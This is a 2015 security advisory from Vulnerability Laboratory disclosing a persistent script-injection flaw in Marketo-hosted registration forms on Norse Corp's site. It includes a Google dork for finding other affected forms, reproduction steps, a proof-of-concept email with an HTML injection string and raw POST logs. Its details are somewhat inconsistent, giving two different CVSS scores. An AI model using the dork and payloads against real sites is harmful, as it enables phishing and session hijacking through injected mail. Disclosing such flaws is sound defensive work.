Lucene search
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ([email protected]) [www.vulnerability-lab.com]VULNERABLE:1321HistoryJan 13, 2015 - 12:00 a.m.
Marketo Cloud - Persistent Mail Encoding Vulnerability
2015-01-1300:00:00
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ([email protected]) [www.vulnerability-lab.com]
www.vulnerability-lab.com
33
Document Title:
===============
Marketo Cloud - Persistent Mail Encoding Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1321
Release Date:
=============
2015-01-13
Vulnerability Laboratory ID (VL-ID):
====================================
1321
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
Marketo Inc. makes marketing automation software for companies. In 2012, Marketo was ranked 78th on the Inc. 500, #7 among software
companies, and #1 among marketing software companies.
(Copy of the Homepage: http://en.wikipedia.org/wiki/Marketo )
Norse is the global leader in live attack intelligence. Norse delivers continuously-updated and unique Internet and darknet intel
that helps organizations detect and block attacks that other systems miss. The superior Norse DarkMatter™ platform detects new
threats and tags nascent hazards long before they`re spotted by traditional `threat intelligence` tools. Norse`s globally
distributed `distant early warning` grid of millions of sensors, honeypots, crawlers and agents deliver unique visibility into
the Internet - especially the darknets, where bad actors operate. The Norse DarkMatter™ network processes hundreds of terabytes
daily and computes over 1,500 distinct risk factors, live, for millions of IP addresses every day. Norse products tightly
integrate with popular SIEM, IPS and next-generation Firewall products to dramatically improve the performance, catch-rate
and security return-on-investment of your existing infrastructure.
( Copy of the Vendor Homepage: http://www.norse-corp.com/about.html )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent mail encoding web vulnerability in the official Marketo cloud online-service web-application.
Vulnerability Disclosure Timeline:
==================================
2014-09-09: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-10: Vendor Notification (Norse-Corp)
2014-09-12: Vendor Response/Feedback (Norse-Corp informs Marketo)
2014-**-**: Vendor Fix/Patch Notification (Barracuda Networks - Developer Team)
2015-01-13: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Norse Corp
Product: Norse Corp - Web Application (Online Service) 2014 Q3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Low
Technical Details & Description:
================================
A persistent mail encoding web vulnerability has been discovered in the official Marketo cloud online-service web-application.
The vulnerability allows an remote attacker to inject own malicious script codes on the application-side of the vulnerable
web-application online-service.
The vulnerability is located in the web input form of the marketo demo registration (request_demo.html) module. Remote attackers
are able to register a request with persistent script code in the first- & lastname values. The affect becomes visible in the outgoing email
of the customers web-server and could maybe affect other sections in the later registered profile. The attacker injects a payload and streams
the malicious mail with own content to another target user email. The filter of the web-server is not validating the context of the mail on input
through the website. The result is an application-side script code execution in the mail header after the introduction user word. The mail includes
the registered user (db stored) with the payload context and does not encode the input.
The wrong encoded cloud forms are located in a lot of famous websites like norse-corp, samsung, intel, canon, citrix, cropcam, enterasys, f5,
kaspersky, sandisk, sony and panasonic. The fail is not the customer who implements because of the input restrictions are being processed through
the cloud stored form in the marketo service. The encoding of the web-server does not encode the input and returns the data with the wrong conditions.
The security risk of the persistent input validation web vulnerability in the mail encoding of the web-server is estimated as medium with a cvss
(common vulnerability scoring system) count of 3.9. Exploitation of the mail encoding and web-server validation vulnerability requires low or medium
user interaction and no privileged customer application user account. Successful exploitation of the persistent mail encoding web vulnerability results
in session hijacking, persistent phishing attacks, persistent redirects to external malicious source and persistent manipulation of affected or connected
module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] request_demo.html
Vulnerable Parameter(s):
[+] Firstname
[+] Lastname
Affected Module(s):
[+] Marketo Notification Mail Service
Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerbaility can be exploited by remote attackers without privileged application user account and with low interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Googel Dork(s): (exp. allinurl:leadCapture/save)
https://encrypted.google.com/#q=allinurl%3AleadCapture%2Fsave&filter=0
Manual steps to reproduce the security vulnerability through norsecorp ...
1. Open your browser and surf to the customer website (http://www.norse-corp.com/)
2. Click the `Request a Demo` button on top of the web-application service
3. Now, include as firstname and lastname a script code with malicious test payload and include a random target user mail (test own!)
4. Save the settings by a click on the send message button in the form
Note: The server saved the POST method request values in the application database with processing to filter
5. The service sends a mail as notification to invite the customer to the demo online-service
Note: The reply goes back to the target mail by the main [email protected] postbox
6. The execution of the injected script code occurs in the outgoing notification mail next to the introduction context word `Hi`
7. Successful reproduce of the security vulnerability!
PoC: (Example Exploit Code) Norse Corp Service Mail ([email protected])
<html>
<head>
<title>Thank You for Contacting Us!</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css"></head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b>
Thank You for Contacting Us!</td></tr><tr><td><b>Von: </b>Norse <[email protected]></td></tr><tr><td><b>Datum: </b>
03.09.2014 16:11</td></tr></table><table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2"><tr><td><b>An:</b>
[email protected]</td></tr></table><br>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head>
<meta http-equiv="Content-Type" content="text/html; ">
<title></title></head>
<body ><div ><div class="mktEditable" id="edit_text_1" ><p>
<span style="font-family: arial, helvetica, sans-serif; font-size: 12px;">Hi "><img src="x">%20>"<iframe src=a>%20<iframe>,<br /> <br />
Thanks for contacting Norse. A representative will be reaching out to you shortly.
In the meantime, please feel free to visit the <a href=
"http://info.norse-corp.com/Q05L0JN0OF2BN0e0R00e5O1" target="_blank"
>Norse website</a> for additional information. <br /> <br /> Norse is the global leader in live attack intelligence.
Norse delivers continuously-updated and unique intelligence that helps organizations detect and block attacks – especially
from the darknets - that other systems miss. The superior Norse DarkMatter™ platform detects new threats and tags nascent
hazards long before they’re spotted by traditional “threat intelligence” tools. <br /><br />We look
forward to speaking with you soon. <br /> </span></p>
<p><span style="font-family: arial, helvetica, sans-serif; font-size: 12px;">Best<br /> Regards,</span></p>
<p><span style="font-size: 12px;"><span style="font-family: verdana,geneva;"><span style="font-family: arial, helvetica, sans-serif;">
Scott Schneider</span><br /><span style="font-family: arial, helvetica, sans-serif;">Vice President of Sales</span><br />
<span style="font-family: arial, helvetica, sans-serif;">[email protected]</span></span><span style="font-family: verdana,geneva;">
<br /></span><span style="font-family: verdana,geneva;"> <br /></span></span></p></div>
</div><IMG SRC="http://info.norse-corp.com/trk?t=1&mid=NjgxLU9OTC0yOTM6MDoxNjE4OjI4Mjg6MDo1NDA6NzoxMzgyODM2LTE6bnVsbA%3D%3D" WIDTH="1"
HEIGHT="1" BORDER="0" ALT="" />
<p><font face="Verdana" size="1">This email was sent to [email protected]. If you no longer wish to receive these emails you may
<a href="http://info.norse-corp.com/u/Me0L0N0JO550R10fB0ON0G2"
>unsubscribe</a> at any time. </font> </p>
</body></html></body></html>
Note: The same issues could be located in the other reference formular links that are present.
For deeper analysis the issue has been reported to the norsecorp with attach ref links.
PoC: Webinar with Rick Holland of Forrester - Actionable Intelligence: A Threat Intelligence Buyer's Guide Service Mail ([email protected])
<td width="51%" valign="top" ><div class="mktEditable" id="Left-Column" style="color:#000000; font-family:'Frutiger Roman',arial,verdana; font-size:12px; " >
<div><span style="font-family: arial, helvetica, sans-serif; font-size: 12px;">Hi [PERSISTENT INJECTED SCRIPT CODE VIA NAME VALUE #2],<br /><br /></span></div>
<div><span style="font-family: arial, helvetica, sans-serif; font-size: 12px;"> Today’s threat actors are more sophisticated than ever, and organizations need
live attack intelligence that alerts them to emerging threats long before they become full-blown attacks that lead to sensitive data loss. Furthermore, organizations
need the most current threat data available in order to protect their networks from incursions – they need real-time actionable intelligence. <br /><br />
Join us for the upcoming webinar, “Actionable Intelligence: A Threat Intelligence Buyer’s Guide” featuring Rick Holland, Principal Analyst at
Forrester Research, and Jeff Harrell, Senior Director, Product Marketing at Norse, to learn how to evaluate the various threat intelligence offerings in the
marketplace, and how to utilize them to prevent today’s advanced attacks. <br /><br /> In this webinar you will learn about: <br />
<ul><li>The criteria needed to effectively evaluate threat intelligence solutions that meet your organization's needs </li>
<li>The value of the different types and sources of internal and external threat intelligence</li>
<li>How best to utilize threat intelligence to realize a greater return on security investments and better protect your organization</li>
</ul><br />Feel free to <a href="http://info.norse-corp.com/wNJLe5ROB0000O1D00N2B0y" target="_blank"
>contact us</a> to learn more information.</span></div><ul></ul></div></td>
--- PoC Session Logs [POST] (Inject) ---
14:06:15.430[638ms][total 638ms] Status: 302[Found]
POST http://pages.norse-corp.com/index.php/leadCapture/save Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[152] Mime Type[text/html]
Request Header:
Host[pages.norse-corp.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://pages.norse-corp.com/WEB-DemoRequest_LP.html]
Cookie[__utma=62177331.1558909612.1410519916.1410519916.1410519916.1; __utmb=62177331.17.10.1410519916; __utmc=62177331; __utmz=62177331.1410519916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1558909612.1410519916; _mkto_trk=id:681-ONL-293&token:_mch-norse-corp.com-1410519918900-26442; __rampmetrics_user=031E00D0-ABD1-4612-B248-3B6E9327E1DB; __rampmetrics_data=%7B%22rampmetrics_id%22%3A%22e1449d703d%22%2C%22uuid%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%2C%22rampmetrics_referring_url__c%22%3A%22undefined.%22%2C%22rampmetrics_inbound_url__c%22%3A%22%22%2C%22rampmetrics_destination_url__c%22%3A%22http%3A%2F%2Fwww.norse-corp.com%2F%22%2C%22rampmetrics_last_visited_url__c%22%3A%22http%3A%2F%2Fwww.norse-corp.com%2Frequest_demo.html%22%2C%22rampmetrics_referring_domain__c%22%3A%22undefined.%22%2C%22rampmetrics_form_type__c%22%3A%22normal%22%2C%22rampmetrics_person_id__c%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%7D; BIGipServersj01web_login_http=67633162.20480.0000; _gat=1; __csess=1410525020184.58GBI8.; __cdrop=.92BA4D.]
Connection[keep-alive]
POST-Daten:
FirstName[%5BSCRIPT+CODE+PAYLOAD+%231%5D]
LastName[%5BSCRIPT+CODE+PAYLOAD+%232%5D]
Email[bkm%40evolution-sec.com]
Phone[01478348732]
Company[%5BSCRIPT+CODE+PAYLOAD+%233%5D]
Product__c_lead[DarkViking]
Comments__c[]
rampmetrics_UTM_Campaign__c[NULL]
rampmetrics_UTM_Content__c[NULL]
rampmetrics_UTM_Medium__c[NULL]
rampmetrics_UTM_Source__c[NULL]
rampmetrics_UTM_Term__c[NULL]
rampmetrics_Search_Phrase__c[]
rampmetrics_Referring_URL__c[]
rampmetrics_Referring_Domain__c[]
rampmetrics_Person_ID__c[]
rampmetrics_Last_Visited_URL__c[]
rampmetrics_Last_URL_Before_Form__c[]
rampmetrics_Landing_Page_URL__c[]
rampmetrics_Form_Fill_Out_URL__c[]
rampmetrics_Destination_URL__c[]
rampmetrics_Campaign_ID__c[]
_marketo_comments[]
lpId[467]
subId[226]
munchkinId[681-ONL-293]
kw[not+found]
cr[not+found]
searchstr[not+found]
lpurl[http%3A%2F%2Fpages.norse-corp.com%2FWEB-DemoRequest_LP.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D]
formid[115]
returnURL[http%3A%2F%2Fpages.norse-corp.com%2FWEBDemoRequest_ContentTemplate_ThankYou.html]
retURL[http%3A%2F%2Fpages.norse-corp.com%2FWEBDemoRequest_ContentTemplate_ThankYou.html]
returnLPId[459]
_mkt_disp[return]
_mkt_trk[id%3A681-ONL-293%26token%3A_mch-norse-corp.com-1410519918900-26442]
_comments_marketo[]
_mkto_version[2.4.7]
MarketoSocialSyndicationId[]
Response Header:
Server[nginx]
Date[Fri, 12 Sep 2014 12:06:18 GMT]
Content-Type[text/html]
Content-Length[152]
Connection[keep-alive]
Location[http://pages.norse-corp.com/WEBDemoRequest_ContentTemplate_ThankYou.html?aliId=822273]
Vary[Accept-Encoding]
Content-Encoding[gzip]
14:06:16.069[725ms][total 725ms] Status: 200[OK]
GET http://pages.norse-corp.com/WEBDemoRequest_ContentTemplate_ThankYou.html?aliId=822273 Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2690] Mime Type[text/html]
Request Header:
Host[pages.norse-corp.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://pages.norse-corp.com/WEB-DemoRequest_LP.html]
Cookie[__utma=62177331.1558909612.1410519916.1410519916.1410519916.1; __utmb=62177331.17.10.1410519916; __utmc=62177331;
__utmz=62177331.1410519916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1558909612.1410519916;
_mkto_trk=id:681-ONL-293&token:_mch-norse-corp.com-1410519918900-26442; __rampmetrics_user=031E00D0-ABD1-4612-B248-3B6E9327E1DB;
__rampmetrics_data=%7B%22rampmetrics_id%22%3A%22e1449d703d%22%2C%22uuid%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%2C%22rampmetrics_
referring_url__c%22%3A%22undefined.%22%2C%22rampmetrics_inbound_url__c%22%3A%22%22%2C%22rampmetrics_destination_url__
c%22%3A%22http%3A%2F%2Fwww.norse-corp.com%2F%22%2C%22rampmetrics_last_visited_url__c%22%3A%22http%3A%2F%2Fwww.norse-corp.com
%2Frequest_demo.html%22%2C%22rampmetrics_referring_domain__c%22%3A%22undefined.%22%2C%22rampmetrics_form_type__c%22%3A%22normal%22%2C%22rampmetrics_person_id__
c%22%3A%22031E00D0-ABD1-4612-B248-3B6E9327E1DB%22%7D; BIGipServersj01web_login_http=67633162.20480.0000; _gat=1; __csess=1410525020184.58GBI8.; __cdrop=.92BA4D.]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 12 Sep 2014 12:06:19 GMT]
Content-Type[text/html; charset=utf-8]
Content-Length[2690]
Connection[keep-alive]
P3P[CP="CAO CURa ADMa DEVa TAIa OUR IND UNI COM NAV INT"]
Vary[*,Accept-Encoding]
Content-Encoding[gzip]
Reference(s):
http://www.norse-corp.com/
http://www.norse-corp.com/request_demo.html
http%3A%2F%2Fpages.norse-corp.com%2FWEBDemoRequest_ContentTemplate_ThankYou.html
http://pages.norse-corp.com/index.php/leadCapture/save
-
http://www.norse-corp.com/contact.html
http://pages.norse-corp.com/WEBPartnerRequest.html
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the firstname and lastname values in the registration forms.
Restrict the input and disallow the usage of special chars to prevent further mail encoding script code attacks with application-side vector.
Security Risk:
==============
The security risk of the persistent mail encoding validation web vulnerability in the registration form is estimated as medium. (CVSS 3.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ([email protected]) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: [email protected] - [email protected] - [email protected]
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
([email protected] or [email protected]) to get a permission.
Copyright © 2015 | Vulnerability Laboratory [Evolution Security]